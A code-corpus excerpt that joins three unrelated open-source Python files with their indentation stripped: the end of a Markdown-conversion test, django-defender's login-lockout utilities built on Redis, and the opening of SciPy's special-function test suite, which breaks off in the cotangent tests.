return self.fixture_data("appfollow", fixture_name, file_type="json")
class ConvertMarkdownTest(TestCase):
def test_convert_bold(self):
# type: () -> None
self.assertEqual(convert_markdown("*test message*"), "**test message**")
def test_convert_italics(self):
# type: () -> None
self.assertEqual(convert_markdown("_test message_"), "*test message*")
self.assertEqual(convert_markdown("_ spaced message _"), " *spaced message* ")
def test_convert_strikethrough(self):
# type: () -> None
self.assertEqual(convert_markdown("~test message~"), "~~test message~~")
| apache-2.0 |
docker-hub/django-defender | defender/utils.py | 1 | 10611 | import logging
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.core.validators import validate_ipv46_address
from django.core.exceptions import ValidationError
from .connection import get_redis_connection
from . import config
from .data import store_login_attempt
REDIS_SERVER = get_redis_connection()
LOG = logging.getLogger(__name__)
def is_valid_ip(ip_address):
""" Check Validity of an IP address """
if not ip_address:
return False
ip_address = ip_address.strip()
try:
validate_ipv46_address(ip_address)
return True
except ValidationError:
return False
def get_ip_address_from_request(request):
""" Makes the best attempt to get the client's real IP or return
the loopback """
remote_addr = request.META.get('REMOTE_ADDR', '')
if remote_addr and is_valid_ip(remote_addr):
return remote_addr.strip()
return '127.0.0.1'
def get_ip(request):
""" get the ip address from the request """
if config.BEHIND_REVERSE_PROXY:
ip_address = request.META.get(config.REVERSE_PROXY_HEADER, '')
ip_address = ip_address.split(",", 1)[0].strip()
if ip_address == '':
ip_address = get_ip_address_from_request(request)
else:
ip_address = get_ip_address_from_request(request)
return ip_address
def get_ip_attempt_cache_key(ip_address):
""" get the cache key by ip """
return "{0}:failed:ip:{1}".format(config.CACHE_PREFIX, ip_address)
def get_username_attempt_cache_key(username):
""" get the cache key by username """
return "{0}:failed:username:{1}".format(config.CACHE_PREFIX, username)
def get_ip_blocked_cache_key(ip_address):
""" get the cache key by ip """
return "{0}:blocked:ip:{1}".format(config.CACHE_PREFIX, ip_address)
def get_username_blocked_cache_key(username):
""" get the cache key by username """
return "{0}:blocked:username:{1}".format(config.CACHE_PREFIX, username)
def strip_keys(key_list):
""" Given a list of keys, remove the prefix and remove just
the data we care about.
for example:
['defender:blocked:ip:ken', 'defender:blocked:ip:joffrey']
would result in:
['ken', 'joffrey']
"""
return [key.split(":")[-1] for key in key_list]
def get_blocked_ips():
""" get a list of blocked ips from redis """
if config.DISABLE_IP_LOCKOUT:
# There are no blocked IP's since we disabled them.
return []
key = get_ip_blocked_cache_key("*")
key_list = [redis_key.decode('utf-8')
for redis_key in REDIS_SERVER.keys(key)]
return strip_keys(key_list)
def get_blocked_usernames():
""" get a list of blocked usernames from redis """
key = get_username_blocked_cache_key("*")
key_list = [redis_key.decode('utf-8')
for redis_key in REDIS_SERVER.keys(key)]
return strip_keys(key_list)
def increment_key(key):
""" given a key increment the value """
pipe = REDIS_SERVER.pipeline()
pipe.incr(key, 1)
if config.COOLOFF_TIME:
pipe.expire(key, config.COOLOFF_TIME)
new_value = pipe.execute()[0]
return new_value
def get_user_attempts(request):
""" Returns number of access attempts for this ip, username
"""
ip_address = get_ip(request)
username = request.POST.get(config.USERNAME_FORM_FIELD, None)
# get by IP
ip_count = REDIS_SERVER.get(get_ip_attempt_cache_key(ip_address))
if not ip_count:
ip_count = 0
ip_count = int(ip_count)
# get by username
username_count = REDIS_SERVER.get(get_username_attempt_cache_key(username))
if not username_count:
username_count = 0
username_count = int(username_count)
# return the larger of the two.
return max(ip_count, username_count)
def block_ip(ip_address):
""" given the ip, block it """
if not ip_address:
# no reason to continue when there is no ip
return
if config.DISABLE_IP_LOCKOUT:
# no need to block, we disabled it.
return
key = get_ip_blocked_cache_key(ip_address)
if config.COOLOFF_TIME:
REDIS_SERVER.set(key, 'blocked', config.COOLOFF_TIME)
else:
REDIS_SERVER.set(key, 'blocked')
def block_username(username):
""" given the username block it. """
if not username:
# no reason to continue when there is no username
return
key = get_username_blocked_cache_key(username)
if config.COOLOFF_TIME:
REDIS_SERVER.set(key, 'blocked', config.COOLOFF_TIME)
else:
REDIS_SERVER.set(key, 'blocked')
def record_failed_attempt(ip_address, username):
""" record the failed login attempt, if over limit return False,
if not over limit return True """
# increment the failed count, and get current number
ip_block = False
if not config.DISABLE_IP_LOCKOUT:
# we only want to increment the IP if this is disabled.
ip_count = increment_key(get_ip_attempt_cache_key(ip_address))
# if over the limit, add to block
if ip_count > config.FAILURE_LIMIT:
block_ip(ip_address)
ip_block = True
user_block = False
user_count = increment_key(get_username_attempt_cache_key(username))
# if over the limit, add to block
if user_count > config.FAILURE_LIMIT:
block_username(username)
user_block = True
# if we have this turned on, then there is no reason to look at ip_block
# we will just look at user_block, and short circut the result since
# we don't need to continue.
if config.DISABLE_IP_LOCKOUT:
# if user_block is True, it means it was blocked
# we need to return False
return not user_block
# we want to make sure both the IP and user is blocked before we
# return False
# this is mostly used when a lot of your users are using proxies,
# and you don't want one user to block everyone on that one IP.
if config.LOCKOUT_BY_IP_USERNAME:
# both ip_block and user_block need to be True in order
# to return a False.
return not (ip_block and user_block)
# if any blocks return False, no blocks. return True
return not (ip_block or user_block)
def unblock_ip(ip_address, pipe=None):
""" unblock the given IP """
do_commit = False
if not pipe:
pipe = REDIS_SERVER.pipeline()
do_commit = True
if ip_address:
pipe.delete(get_ip_attempt_cache_key(ip_address))
pipe.delete(get_ip_blocked_cache_key(ip_address))
if do_commit:
pipe.execute()
def unblock_username(username, pipe=None):
""" unblock the given Username """
do_commit = False
if not pipe:
pipe = REDIS_SERVER.pipeline()
do_commit = True
if username:
pipe.delete(get_username_attempt_cache_key(username))
pipe.delete(get_username_blocked_cache_key(username))
if do_commit:
pipe.execute()
def reset_failed_attempts(ip_address=None, username=None):
""" reset the failed attempts for these ip's and usernames
"""
pipe = REDIS_SERVER.pipeline()
unblock_ip(ip_address, pipe=pipe)
unblock_username(username, pipe=pipe)
pipe.execute()
def lockout_response(request):
""" if we are locked out, here is the response """
if config.LOCKOUT_TEMPLATE:
context = {
'cooloff_time_seconds': config.COOLOFF_TIME,
'cooloff_time_minutes': config.COOLOFF_TIME / 60,
'failure_limit': config.FAILURE_LIMIT,
}
return render_to_response(config.LOCKOUT_TEMPLATE, context,
context_instance=RequestContext(request))
if config.LOCKOUT_URL:
return HttpResponseRedirect(config.LOCKOUT_URL)
if config.COOLOFF_TIME:
return HttpResponse("Account locked: too many login attempts. "
"Please try again later.")
else:
return HttpResponse("Account locked: too many login attempts. "
"Contact an admin to unlock your account.")
def is_user_already_locked(username):
"""Is this username already locked?"""
if username is None:
return False
return REDIS_SERVER.get(get_username_blocked_cache_key(username))
def is_source_ip_already_locked(ip_address):
"""Is this IP already locked?"""
if ip_address is None:
return False
if config.DISABLE_IP_LOCKOUT:
return False
return REDIS_SERVER.get(get_ip_blocked_cache_key(ip_address))
def is_already_locked(request):
"""Parse the username & IP from the request, and see if it's already locked."""
user_blocked = is_user_already_locked(
request.POST.get(config.USERNAME_FORM_FIELD, None))
ip_blocked = is_source_ip_already_locked(get_ip(request))
if config.LOCKOUT_BY_IP_USERNAME:
# if both this IP and this username are present the request is blocked
return ip_blocked and user_blocked
return ip_blocked or user_blocked
def check_request(request, login_unsuccessful):
""" check the request, and process results"""
ip_address = get_ip(request)
username = request.POST.get(config.USERNAME_FORM_FIELD, None)
if not login_unsuccessful:
# user logged in -- forget the failed attempts
reset_failed_attempts(ip_address=ip_address, username=username)
return True
else:
# add a failed attempt for this user
return record_failed_attempt(ip_address, username)
def add_login_attempt_to_db(request, login_valid):
""" Create a record for the login attempt If using celery call celery
task, if not, call the method normally """
if not config.STORE_ACCESS_ATTEMPTS:
# If we don't want to store in the database, then don't proceed.
return
user_agent = request.META.get('HTTP_USER_AGENT', '<unknown>')[:255]
ip_address = get_ip(request)
username = request.POST.get(config.USERNAME_FORM_FIELD, None)
http_accept = request.META.get('HTTP_ACCEPT', '<unknown>')
path_info = request.META.get('PATH_INFO', '<unknown>')
if config.USE_CELERY:
from .tasks import add_login_attempt_task
add_login_attempt_task.delay(user_agent, ip_address, username,
http_accept, path_info, login_valid)
else:
store_login_attempt(user_agent, ip_address, username,
http_accept, path_info, login_valid)
| apache-2.0 |
Event38/MissionPlanner | Lib/site-packages/scipy/special/tests/test_basic.py | 57 | 87457 | #this program corresponds to special.py
### Means test is not done yet
#E Means test is giving error (E)
#F Means test is failing (F)
#EF Means test is giving error and Failing
#! Means test is segfaulting
#8 Means test runs forever
### test_besselpoly
### test_mathieu_a
### test_mathieu_even_coef
### test_mathieu_odd_coef
### test_modfresnelp
### test_modfresnelm
# test_pbdv_seq
### test_pbvv_seq
### test_sph_harm
# test_sph_in
# test_sph_jn
# test_sph_kn
import numpy as np
from numpy import array, isnan, r_, arange, finfo, pi, sin, cos, tan, exp, log, zeros, \
sqrt, asarray, inf, nan_to_num, real, arctan, float_
from numpy.testing import assert_equal, assert_almost_equal, assert_array_equal, \
assert_array_almost_equal, assert_approx_equal, assert_, \
rand, dec, TestCase, run_module_suite, assert_allclose
from scipy import special
import scipy.special._cephes as cephes
from scipy.special._testutils import assert_tol_equal, with_special_errors
class TestCephes(TestCase):
def test_airy(self):
cephes.airy(0)
def test_airye(self):
cephes.airye(0)
def test_bdtr(self):
assert_equal(cephes.bdtr(1,1,0.5),1.0)
def test_bdtri(self):
assert_equal(cephes.bdtri(1,3,0.5),0.5)
def test_bdtrc(self):
assert_equal(cephes.bdtrc(1,3,0.5),0.5)
def test_bdtrin(self):
assert_equal(cephes.bdtrin(1,0,1),5.0)
def test_bdtrik(self):
cephes.bdtrik(1,3,0.5)
def test_bei(self):
assert_equal(cephes.bei(0),0.0)
def test_beip(self):
assert_equal(cephes.beip(0),0.0)
def test_ber(self):
assert_equal(cephes.ber(0),1.0)
def test_berp(self):
assert_equal(cephes.berp(0),0.0)
def test_besselpoly(self):
assert_equal(cephes.besselpoly(0,0,0),1.0)
def test_beta(self):
assert_equal(cephes.beta(1,1),1.0)
def test_betainc(self):
assert_equal(cephes.betainc(1,1,1),1.0)
def test_betaln(self):
assert_equal(cephes.betaln(1,1),0.0)
def test_betaincinv(self):
assert_equal(cephes.betaincinv(1,1,1),1.0)
def test_btdtr(self):
assert_equal(cephes.btdtr(1,1,1),1.0)
def test_btdtri(self):
assert_equal(cephes.btdtri(1,1,1),1.0)
def test_btdtria(self):
assert_equal(cephes.btdtria(1,1,1),5.0)
def test_btdtrib(self):
assert_equal(cephes.btdtrib(1,1,1),5.0)
def test_cbrt(self):
assert_approx_equal(cephes.cbrt(1),1.0)
def test_chdtr(self):
assert_equal(cephes.chdtr(1,0),0.0)
def test_chdtrc(self):
assert_equal(cephes.chdtrc(1,0),1.0)
def test_chdtri(self):
assert_equal(cephes.chdtri(1,1),0.0)
def test_chdtriv(self):
assert_equal(cephes.chdtriv(0,0),5.0)
def test_chndtr(self):
assert_equal(cephes.chndtr(0,1,0),0.0)
def test_chndtridf(self):
assert_equal(cephes.chndtridf(0,0,1),5.0)
def test_chndtrinc(self):
assert_equal(cephes.chndtrinc(0,1,0),5.0)
def test_chndtrix(self):
assert_equal(cephes.chndtrix(0,1,0),0.0)
def test_cosdg(self):
assert_equal(cephes.cosdg(0),1.0)
def test_cosm1(self):
assert_equal(cephes.cosm1(0),0.0)
def test_cotdg(self):
assert_almost_equal(cephes.cotdg(45),1.0)
def test_dawsn(self):
assert_equal(cephes.dawsn(0),0.0)
def test_ellipe(self):
assert_equal(cephes.ellipe(1),1.0)
def test_ellipeinc(self):
assert_equal(cephes.ellipeinc(0,1),0.0)
def test_ellipj(self):
cephes.ellipj(0,1)
def test_ellipk(self):
cephes.ellipk(0)#==pi/2
def test_ellipkinc(self):
assert_equal(cephes.ellipkinc(0,0),0.0)
def test_erf(self):
assert_equal(cephes.erf(0),0.0)
def test_erfc(self):
assert_equal(cephes.erfc(0),1.0)
def test_exp1(self):
cephes.exp1(1)
def test_expi(self):
cephes.expi(1)
def test_expn(self):
cephes.expn(1,1)
def test_exp1_reg(self):
# Regression for #834
a = cephes.exp1(-complex(19.9999990))
b = cephes.exp1(-complex(19.9999991))
assert_array_almost_equal(a.imag, b.imag)
def test_exp10(self):
assert_approx_equal(cephes.exp10(2),100.0)
def test_exp2(self):
assert_equal(cephes.exp2(2),4.0)
def test_expm1(self):
assert_equal(cephes.expm1(0),0.0)
def test_fdtr(self):
assert_equal(cephes.fdtr(1,1,0),0.0)
def test_fdtrc(self):
assert_equal(cephes.fdtrc(1,1,0),1.0)
def test_fdtri(self):
cephes.fdtri(1,1,0.5)
def test_fdtridfd(self):
assert_equal(cephes.fdtridfd(1,0,0),5.0)
def test_fresnel(self):
assert_equal(cephes.fresnel(0),(0.0,0.0))
def test_gamma(self):
assert_equal(cephes.gamma(5),24.0)
def test_gammainc(self):
assert_equal(cephes.gammainc(5,0),0.0)
def test_gammaincc(self):
assert_equal(cephes.gammaincc(5,0),1.0)
def test_gammainccinv(self):
assert_equal(cephes.gammainccinv(5,1),0.0)
def test_gammaln(self):
cephes.gammaln(10)
def test_gdtr(self):
assert_equal(cephes.gdtr(1,1,0),0.0)
def test_gdtrc(self):
assert_equal(cephes.gdtrc(1,1,0),1.0)
def test_gdtria(self):
assert_equal(cephes.gdtria(0,1,1),0.0)
def test_gdtrib(self):
cephes.gdtrib(1,0,1)
#assert_equal(cephes.gdtrib(1,0,1),5.0)
def test_gdtrix(self):
cephes.gdtrix(1,1,.1)
def test_hankel1(self):
cephes.hankel1(1,1)
def test_hankel1e(self):
cephes.hankel1e(1,1)
def test_hankel2(self):
cephes.hankel2(1,1)
def test_hankel2e(self):
cephes.hankel2e(1,1)
def test_hyp1f1(self):
assert_approx_equal(cephes.hyp1f1(1,1,1), exp(1.0))
assert_approx_equal(cephes.hyp1f1(3,4,-6), 0.026056422099537251095)
cephes.hyp1f1(1,1,1)
def test_hyp1f2(self):
cephes.hyp1f2(1,1,1,1)
def test_hyp2f0(self):
cephes.hyp2f0(1,1,1,1)
def test_hyp2f1(self):
assert_equal(cephes.hyp2f1(1,1,1,0),1.0)
def test_hyp3f0(self):
assert_equal(cephes.hyp3f0(1,1,1,0),(1.0,0.0))
def test_hyperu(self):
assert_equal(cephes.hyperu(0,1,1),1.0)
def test_i0(self):
assert_equal(cephes.i0(0),1.0)
def test_i0e(self):
assert_equal(cephes.i0e(0),1.0)
def test_i1(self):
assert_equal(cephes.i1(0),0.0)
def test_i1e(self):
assert_equal(cephes.i1e(0),0.0)
def test_it2i0k0(self):
cephes.it2i0k0(1)
def test_it2j0y0(self):
cephes.it2j0y0(1)
def test_it2struve0(self):
cephes.it2struve0(1)
def test_itairy(self):
cephes.itairy(1)
def test_iti0k0(self):
assert_equal(cephes.iti0k0(0),(0.0,0.0))
def test_itj0y0(self):
assert_equal(cephes.itj0y0(0),(0.0,0.0))
def test_itmodstruve0(self):
assert_equal(cephes.itmodstruve0(0),0.0)
def test_itstruve0(self):
assert_equal(cephes.itstruve0(0),0.0)
def test_iv(self):
assert_equal(cephes.iv(1,0),0.0)
def _check_ive(self):
assert_equal(cephes.ive(1,0),0.0)
def test_j0(self):
assert_equal(cephes.j0(0),1.0)
def test_j1(self):
assert_equal(cephes.j1(0),0.0)
def test_jn(self):
assert_equal(cephes.jn(0,0),1.0)
def test_jv(self):
assert_equal(cephes.jv(0,0),1.0)
def _check_jve(self):
assert_equal(cephes.jve(0,0),1.0)
def test_k0(self):
cephes.k0(2)
def test_k0e(self):
cephes.k0e(2)
def test_k1(self):
cephes.k1(2)
def test_k1e(self):
cephes.k1e(2)
def test_kei(self):
cephes.kei(2)
def test_keip(self):
assert_equal(cephes.keip(0),0.0)
def test_ker(self):
cephes.ker(2)
def test_kerp(self):
cephes.kerp(2)
def _check_kelvin(self):
cephes.kelvin(2)
def test_kn(self):
cephes.kn(1,1)
def test_kolmogi(self):
assert_equal(cephes.kolmogi(1),0.0)
def test_kolmogorov(self):
assert_equal(cephes.kolmogorov(0),1.0)
def _check_kv(self):
cephes.kv(1,1)
def _check_kve(self):
cephes.kve(1,1)
def test_log1p(self):
assert_equal(cephes.log1p(0),0.0)
def test_lpmv(self):
assert_equal(cephes.lpmv(0,0,1),1.0)
def test_mathieu_a(self):
assert_equal(cephes.mathieu_a(1,0),1.0)
def test_mathieu_b(self):
assert_equal(cephes.mathieu_b(1,0),1.0)
def test_mathieu_cem(self):
assert_equal(cephes.mathieu_cem(1,0,0),(1.0,0.0))
def test_mathieu_modcem1(self):
assert_equal(cephes.mathieu_modcem1(1,0,0),(0.0,0.0))
def test_mathieu_modcem2(self):
cephes.mathieu_modcem2(1,1,1)
def test_mathieu_sem(self):
assert_equal(cephes.mathieu_sem(1,0,0),(0.0,1.0))
def test_mathieu_modsem1(self):
assert_equal(cephes.mathieu_modsem1(1,0,0),(0.0,0.0))
def test_mathieu_modsem2(self):
cephes.mathieu_modsem2(1,1,1)
def test_modfresnelm(self):
cephes.modfresnelm(0)
def test_modfresnelp(self):
cephes.modfresnelp(0)
def _check_modstruve(self):
assert_equal(cephes.modstruve(1,0),0.0)
def test_nbdtr(self):
assert_equal(cephes.nbdtr(1,1,1),1.0)
def test_nbdtrc(self):
assert_equal(cephes.nbdtrc(1,1,1),0.0)
def test_nbdtri(self):
assert_equal(cephes.nbdtri(1,1,1),1.0)
def __check_nbdtrik(self):
cephes.nbdtrik(1,.4,.5)
def test_nbdtrin(self):
assert_equal(cephes.nbdtrin(1,0,0),5.0)
def test_ncfdtr(self):
assert_equal(cephes.ncfdtr(1,1,1,0),0.0)
def test_ncfdtri(self):
assert_equal(cephes.ncfdtri(1,1,1,0),0.0)
def test_ncfdtridfd(self):
cephes.ncfdtridfd(1,0.5,0,1)
def __check_ncfdtridfn(self):
cephes.ncfdtridfn(1,0.5,0,1)
def __check_ncfdtrinc(self):
cephes.ncfdtrinc(1,0.5,0,1)
def test_nctdtr(self):
assert_equal(cephes.nctdtr(1,0,0),0.5)
def __check_nctdtridf(self):
cephes.nctdtridf(1,0.5,0)
def test_nctdtrinc(self):
cephes.nctdtrinc(1,0,0)
def test_nctdtrit(self):
cephes.nctdtrit(.1,0.2,.5)
def test_ndtr(self):
assert_equal(cephes.ndtr(0), 0.5)
assert_almost_equal(cephes.ndtr(1), 0.84134474606)
def test_ndtri(self):
assert_equal(cephes.ndtri(0.5),0.0)
def test_nrdtrimn(self):
assert_approx_equal(cephes.nrdtrimn(0.5,1,1),1.0)
def test_nrdtrisd(self):
assert_tol_equal(cephes.nrdtrisd(0.5,0.5,0.5), 0.0,
atol=0, rtol=0)
def test_obl_ang1(self):
cephes.obl_ang1(1,1,1,0)
def test_obl_ang1_cv(self):
result = cephes.obl_ang1_cv(1,1,1,1,0)
assert_almost_equal(result[0],1.0)
assert_almost_equal(result[1],0.0)
def _check_obl_cv(self):
assert_equal(cephes.obl_cv(1,1,0),2.0)
def test_obl_rad1(self):
cephes.obl_rad1(1,1,1,0)
def test_obl_rad1_cv(self):
cephes.obl_rad1_cv(1,1,1,1,0)
def test_obl_rad2(self):
cephes.obl_rad2(1,1,1,0)
def test_obl_rad2_cv(self):
cephes.obl_rad2_cv(1,1,1,1,0)
def test_pbdv(self):
assert_equal(cephes.pbdv(1,0),(0.0,1.0))
def test_pbvv(self):
cephes.pbvv(1,0)
def test_pbwa(self):
cephes.pbwa(1,0)
def test_pdtr(self):
cephes.pdtr(0,1)
def test_pdtrc(self):
cephes.pdtrc(0,1)
def test_pdtri(self):
cephes.pdtri(0.5,0.5)
def test_pdtrik(self):
cephes.pdtrik(0.5,1)
def test_pro_ang1(self):
cephes.pro_ang1(1,1,1,0)
def test_pro_ang1_cv(self):
assert_array_almost_equal(cephes.pro_ang1_cv(1,1,1,1,0),
array((1.0,0.0)))
def _check_pro_cv(self):
assert_equal(cephes.pro_cv(1,1,0),2.0)
def test_pro_rad1(self):
cephes.pro_rad1(1,1,1,0.1)
def test_pro_rad1_cv(self):
cephes.pro_rad1_cv(1,1,1,1,0)
def test_pro_rad2(self):
cephes.pro_rad2(1,1,1,0)
def test_pro_rad2_cv(self):
cephes.pro_rad2_cv(1,1,1,1,0)
def test_psi(self):
cephes.psi(1)
def test_radian(self):
assert_equal(cephes.radian(0,0,0),0)
def test_rgamma(self):
assert_equal(cephes.rgamma(1),1.0)
def test_round(self):
assert_equal(cephes.round(3.4),3.0)
assert_equal(cephes.round(-3.4),-3.0)
assert_equal(cephes.round(3.6),4.0)
assert_equal(cephes.round(-3.6),-4.0)
assert_equal(cephes.round(3.5),4.0)
assert_equal(cephes.round(-3.5),-4.0)
def test_shichi(self):
cephes.shichi(1)
def test_sici(self):
cephes.sici(1)
s, c = cephes.sici(np.inf)
assert_almost_equal(s, np.pi * 0.5)
assert_almost_equal(c, 0)
s, c = cephes.sici(-np.inf)
assert_almost_equal(s, -np.pi * 0.5)
assert_(np.isnan(c), "cosine integral(-inf) is not nan")
def test_sindg(self):
assert_equal(cephes.sindg(90),1.0)
def test_smirnov(self):
assert_equal(cephes.smirnov(1,.1),0.9)
def test_smirnovi(self):
assert_almost_equal(cephes.smirnov(1,cephes.smirnovi(1,0.4)),0.4)
assert_almost_equal(cephes.smirnov(1,cephes.smirnovi(1,0.6)),0.6)
def test_spence(self):
assert_equal(cephes.spence(1),0.0)
def test_stdtr(self):
assert_equal(cephes.stdtr(1,0),0.5)
def test_stdtridf(self):
cephes.stdtridf(0.7,1)
def test_stdtrit(self):
cephes.stdtrit(1,0.7)
def test_struve(self):
assert_equal(cephes.struve(0,0),0.0)
def test_tandg(self):
assert_equal(cephes.tandg(45),1.0)
def test_tklmbda(self):
assert_almost_equal(cephes.tklmbda(1,1),1.0)
def test_y0(self):
cephes.y0(1)
def test_y1(self):
cephes.y1(1)
def test_yn(self):
cephes.yn(1,1)
def test_yv(self):
cephes.yv(1,1)
def _check_yve(self):
cephes.yve(1,1)
def test_zeta(self):
cephes.zeta(2,2)
def test_zetac(self):
assert_equal(cephes.zetac(0),-1.5)
def test_wofz(self):
cephes.wofz(0)
class TestAiry(TestCase):
def test_airy(self):
#This tests the airy function to ensure 8 place accuracy in computation
x = special.airy(.99)
assert_array_almost_equal(x,array([0.13689066,-0.16050153,1.19815925,0.92046818]),8)
x = special.airy(.41)
assert_array_almost_equal(x,array([0.25238916,-.23480512,0.80686202,0.51053919]),8)
x = special.airy(-.36)
assert_array_almost_equal(x,array([0.44508477,-0.23186773,0.44939534,0.48105354]),8)
def test_airye(self):
a = special.airye(0.01)
b = special.airy(0.01)
b1 = [None]*4
for n in range(2):
b1[n] = b[n]*exp(2.0/3.0*0.01*sqrt(0.01))
for n in range(2,4):
b1[n] = b[n]*exp(-abs(real(2.0/3.0*0.01*sqrt(0.01))))
assert_array_almost_equal(a,b1,6)
def test_bi_zeros(self):
bi = special.bi_zeros(2)
bia = (array([-1.17371322, -3.2710930]),
array([-2.29443968, -4.07315509]),
array([-0.45494438, 0.39652284]),
array([ 0.60195789 , -0.76031014]))
assert_array_almost_equal(bi,bia,4)
def test_ai_zeros(self):
ai = special.ai_zeros(1)
assert_array_almost_equal(ai,(array([-2.33810741]),
array([-1.01879297]),
array([ 0.5357]),
array([ 0.7012])),4)
class TestAssocLaguerre(TestCase):
def test_assoc_laguerre(self):
a1 = special.genlaguerre(11,1)
a2 = special.assoc_laguerre(.2,11,1)
assert_array_almost_equal(a2,a1(.2),8)
a2 = special.assoc_laguerre(1,11,1)
assert_array_almost_equal(a2,a1(1),8)
class TestBesselpoly(TestCase):
def test_besselpoly(self):
pass
class TestKelvin(TestCase):
def test_bei(self):
mbei = special.bei(2)
assert_almost_equal(mbei, 0.9722916273066613,5)#this may not be exact
def test_beip(self):
mbeip = special.beip(2)
assert_almost_equal(mbeip,0.91701361338403631,5)#this may not be exact
def test_ber(self):
mber = special.ber(2)
assert_almost_equal(mber,0.75173418271380821,5)#this may not be exact
def test_berp(self):
mberp = special.berp(2)
assert_almost_equal(mberp,-0.49306712470943909,5)#this may not be exact
def test_bei_zeros(self):
bi = special.bi_zeros(5)
assert_array_almost_equal(bi[0],array([-1.173713222709127,
-3.271093302836352,
-4.830737841662016,
-6.169852128310251,
-7.376762079367764]),11)
assert_array_almost_equal(bi[1],array([-2.294439682614122,
-4.073155089071828,
-5.512395729663599,
-6.781294445990305,
-7.940178689168587]),10)
assert_array_almost_equal(bi[2],array([-0.454944383639657,
0.396522836094465,
-0.367969161486959,
0.349499116831805,
-0.336026240133662]),11)
assert_array_almost_equal(bi[3],array([0.601957887976239,
-0.760310141492801,
0.836991012619261,
-0.88947990142654,
0.929983638568022]),11)
def test_beip_zeros(self):
bip = special.beip_zeros(5)
assert_array_almost_equal(bip,array([ 3.772673304934953,
8.280987849760042,
12.742147523633703,
17.193431752512542,
21.641143941167325]),4)
def test_ber_zeros(self):
ber = special.ber_zeros(5)
assert_array_almost_equal(ber,array([2.84892,
7.23883,
11.67396,
16.11356,
20.55463]),4)
def test_berp_zeros(self):
brp = special.berp_zeros(5)
assert_array_almost_equal(brp,array([6.03871,
10.51364,
14.96844,
19.41758,
23.86430]),4)
def test_kelvin(self):
mkelv = special.kelvin(2)
assert_array_almost_equal(mkelv,(special.ber(2) + special.bei(2)*1j,
special.ker(2) + special.kei(2)*1j,
special.berp(2) + special.beip(2)*1j,
special.kerp(2) + special.keip(2)*1j),8)
def test_kei(self):
mkei = special.kei(2)
assert_almost_equal(mkei,-0.20240006776470432,5)
def test_keip(self):
mkeip = special.keip(2)
assert_almost_equal(mkeip,0.21980790991960536,5)
def test_ker(self):
mker = special.ker(2)
assert_almost_equal(mker,-0.041664513991509472,5)
def test_kerp(self):
mkerp = special.kerp(2)
assert_almost_equal(mkerp,-0.10660096588105264,5)
def test_kei_zeros(self):
kei = special.kei_zeros(5)
assert_array_almost_equal(kei,array([ 3.91467,
8.34422,
12.78256,
17.22314,
21.66464]),4)
def test_keip_zeros(self):
keip = special.keip_zeros(5)
assert_array_almost_equal(keip,array([ 4.93181,
9.40405,
13.85827,
18.30717,
22.75379]),4)
# numbers come from 9.9 of A&S pg. 381
def test_kelvin_zeros(self):
tmp = special.kelvin_zeros(5)
berz,beiz,kerz,keiz,berpz,beipz,kerpz,keipz = tmp
assert_array_almost_equal(berz,array([ 2.84892,
7.23883,
11.67396,
16.11356,
20.55463]),4)
assert_array_almost_equal(beiz,array([ 5.02622,
9.45541,
13.89349,
18.33398,
22.77544]),4)
assert_array_almost_equal(kerz,array([ 1.71854,
6.12728,
10.56294,
15.00269,
19.44382]),4)
assert_array_almost_equal(keiz,array([ 3.91467,
8.34422,
12.78256,
17.22314,
21.66464]),4)
assert_array_almost_equal(berpz,array([ 6.03871,
10.51364,
14.96844,
19.41758,
23.86430]),4)
assert_array_almost_equal(beipz,array([ 3.77267,
# table from 1927 had 3.77320
# but this is more accurate
8.28099,
12.74215,
17.19343,
21.64114]),4)
assert_array_almost_equal(kerpz,array([ 2.66584,
7.17212,
11.63218,
16.08312,
20.53068]),4)
assert_array_almost_equal(keipz,array([ 4.93181,
9.40405,
13.85827,
18.30717,
22.75379]),4)
def test_ker_zeros(self):
ker = special.ker_zeros(5)
assert_array_almost_equal(ker,array([ 1.71854,
6.12728,
10.56294,
15.00269,
19.44381]),4)
def test_kerp_zeros(self):
kerp = special.kerp_zeros(5)
assert_array_almost_equal(kerp,array([ 2.66584,
7.17212,
11.63218,
16.08312,
20.53068]),4)
class TestBernoulli(TestCase):
def test_bernoulli(self):
brn = special.bernoulli(5)
assert_array_almost_equal(brn,array([1.0000,
-0.5000,
0.1667,
0.0000,
-0.0333,
0.0000]),4)
class TestBeta(TestCase):
def test_beta(self):
bet = special.beta(2,4)
betg = (special.gamma(2)*special.gamma(4))/special.gamma(6)
assert_almost_equal(bet,betg,8)
def test_betaln(self):
betln = special.betaln(2,4)
bet = log(abs(special.beta(2,4)))
assert_almost_equal(betln,bet,8)
def test_betainc(self):
btinc = special.betainc(1,1,.2)
assert_almost_equal(btinc,0.2,8)
def test_betaincinv(self):
y = special.betaincinv(2,4,.5)
comp = special.betainc(2,4,y)
assert_almost_equal(comp,.5,5)
class TestTrigonometric(TestCase):
def test_cbrt(self):
cb = special.cbrt(27)
cbrl = 27**(1.0/3.0)
assert_approx_equal(cb,cbrl)
def test_cbrtmore(self):
cb1 = special.cbrt(27.9)
cbrl1 = 27.9**(1.0/3.0)
assert_almost_equal(cb1,cbrl1,8)
def test_cosdg(self):
cdg = special.cosdg(90)
cdgrl = cos(pi/2.0)
assert_almost_equal(cdg,cdgrl,8)
def test_cosdgmore(self):
cdgm = special.cosdg(30)
cdgmrl = cos(pi/6.0)
assert_almost_equal(cdgm,cdgmrl,8)
def test_cosm1(self):
cs = (special.cosm1(0),special.cosm1(.3),special.cosm1(pi/10))
csrl = (cos(0)-1,cos(.3)-1,cos(pi/10)-1)
assert_array_almost_equal(cs,csrl,8)
def test_cotdg(self):
ct = special.cotdg(30)
ctrl = tan(pi/6.0)**(-1)
assert_almost_equal(ct,ctrl,8)
def test_cotdgmore(self):
ct1 = special.cotdg(45)
ctrl1 = tan(pi/4.0)**(-1)
assert_almost_equal(ct1,ctrl1,8)
def test_specialpoints(self):
assert_almost_equal(special.cotdg(45), 1.0, 14)
assert_almost_equal(special.cotdg(-45), -1.0, 14)
assert_almost_equal(special.cotdg(90), 0.0, 14)
assert_almost_equal(special.cotdg(-90), 0.0, 14)
assert_almost_equal(special.cotdg(135), -1.0, 14)
assert_almost_equal(special.cotdg(-135), 1.0, 14)
assert_almost_equal(special.cotdg(225), 1.0, 14)
assert_almost_equal(special.cotdg(-225), -1.0, 14)
assert_almost_equal(special.cotdg(270), 0.0, 14)
assert_almost_equal(special.cotdg(-270), 0.0, 14)
assert_almost_equal(special.cotdg(315), -1.0, 14)
assert_almost_equal(special.cotdg(-315), 1.0, 14)
